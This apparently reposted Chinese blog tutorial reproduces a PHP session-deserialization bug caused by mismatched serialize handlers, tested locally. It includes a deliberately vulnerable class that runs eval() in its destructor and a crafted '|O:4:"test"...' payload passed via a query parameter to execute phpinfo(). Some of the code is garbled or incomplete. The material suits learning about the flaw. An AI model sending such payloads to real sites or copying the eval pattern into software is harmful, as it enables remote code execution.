php session 反序列化,PHP SESSION反序列化本地样例分析
PHP SESSION反序列化本地樣例分析
0X00漏洞原因
主要原因是: ini_set(‘session.serialize_handler’, ‘php_serialize’);
ini_set(‘session.serialize_handler’, ‘php’);
兩者處理session的方式不同。
0X01漏洞分析
如果在PHP在反序列化存儲的$_SESSION數據時使用的引擎和序列化使用的引擎不一樣,會導致數據無法正確第反序列化。通過精心構造的數據包,就可以繞過程序的驗證或者是執(zhí)行一些系統(tǒng)的方法
0X02漏洞環(huán)境
Windows10
Phpstudy一件集成環(huán)境
0X03漏洞復現(xiàn)
首先現(xiàn)在本地phpstudy網站根目錄新建倆個測試用例1.php和2.php
內容分別為
1.php:
ini_set('session.serialize_handler', 'php');
session_start();classtest {var$hi;
function __construct(){
$this->hi = 'phpinfo();';
}
function __destruct() {
eval($this->hi);
}
}?>
2.php:
漏洞利用
首先構造反序列化字符串:O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}
可以看到2.php中接收的參數為a
提交2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";},
也就是訪問127.0.0.1\2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";},
訪問后結果如下:
然后再訪問http://127.0.0.1/test1.php,成功執(zhí)行phpinfo()
0X04漏洞分析
提交2.php?a=|O:4:“test”:1:{s:2:“hi”;s:10:“phpinfo();”;},
傳入的數據會按照php_serialize來進行序列化:a:1:{s:4:"test";s:43:"|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}
此時訪問1.php,應用程序會按照php來反序列化SESSION中的數據,此時就會反序列化偽造的數據,php引擎會以|作為作為key和value的分隔符,那么就會將a:1:{s:4:"test";s:43:"作為SESSION的key,將O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}作為value,然后進行反序列化,最后就會就會實例化test對象,最后就會執(zhí)行析構函數中的eval()方法。
創(chuàng)作挑戰(zhàn)賽新人創(chuàng)作獎勵來咯,堅持創(chuàng)作打卡瓜分現(xiàn)金大獎總結
以上是生活随笔為你收集整理的php session 反序列化,PHP SESSION反序列化本地样例分析的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: python获取文件夹名_python基
- 下一篇: java类加载及new对象的过程